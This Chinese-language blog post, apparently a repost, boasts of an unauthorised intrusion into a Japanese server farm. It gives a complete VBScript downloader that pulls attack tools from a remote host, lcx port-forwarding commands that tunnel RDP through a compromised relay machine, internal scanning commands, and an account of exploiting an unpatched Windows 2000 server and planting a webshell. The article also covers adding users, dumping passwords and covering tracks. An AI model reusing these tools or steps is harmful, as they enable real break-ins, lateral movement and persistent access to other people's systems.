渗透日本服务器群
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^
开局
入手点是一个注射点sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。
以下是引用片段
down.vbs
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
use: cscript down.vbs http://ip/lcx.exe lcx.exe (路径默认在system32下)
这个下载脚本可以重复使用,也不会暴露我存放工具的地址。(有些下载脚本把下载地址写在里面,个人觉得不很好。)
由于本机连接日本网络比较慢。连拨两个VPN,再登上日本本土的一台肉鸡(我想这样速度不会差了,ps肉鸡的作用体现出来了)。
加了用户。在肉鸡终端lcx -listen 520 1982,目标机lcx -slave myip 520 127.0.0.1 3389
ok,终端里填127.0.0.1:1982 顺利登陆。
中盘
win2000系统,mssql server
先抓个系统密码,找下sql密码。查看了下一些信息,并检查是否还有同行的后门,清除之。
分析了下密码:(数字+机器名+数字)
其他都是鸟语也看不太明白。载了几个基本工具放个隐藏目录。
ps一般进去后总得收拾下,最好不要种马。死得快,也易暴露。
这时候就盘算着怎么拿web的权限了。(分析网络拓扑结构了)
先看下网上邻居
workgroup
CSQL2006
B-DB
BTENDB
....
很明显,都是数据库服务器。
再往上一层,又发现一个工作组
web-k..jp
coo_db
...
日,还是数据库服务器。
ipconfig /all
192.168.10.18 只有一个内网ip
oks tcp 192.168.10.1 192.168.10.254 80 20 /save
用s扫下内网开80的机子,线程设置为20,讲究精确度嘛。
很遗憾,结果出来的几个机子都是数据库服务器,上面并没有网站。
我就纳闷了,web服务器跑哪了呢?
收官
翻了一阵子,仔细分析了网络拓扑结构。让我找到了
192.168.1.1-255这段是web服务器群
接下来,用s果然扫出一片。再对应外网ip,挑选溢出的下手对象(192.168.1.19)(倭奴喜欢古董级的win2000,好多补丁都不全,好溢出)
很舒坦地日下来,然后载个webshell放到web目录的偏僻角落。擦擦屁股走人。
ps图是我溢出一台数据库服务器时截下的
500)this.width=500" title="点击这里用新窗口浏览图片" />
上一篇:黑客入侵“在线影院”全过程2
下一篇:一次透过SNIFF有目的性的入侵
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座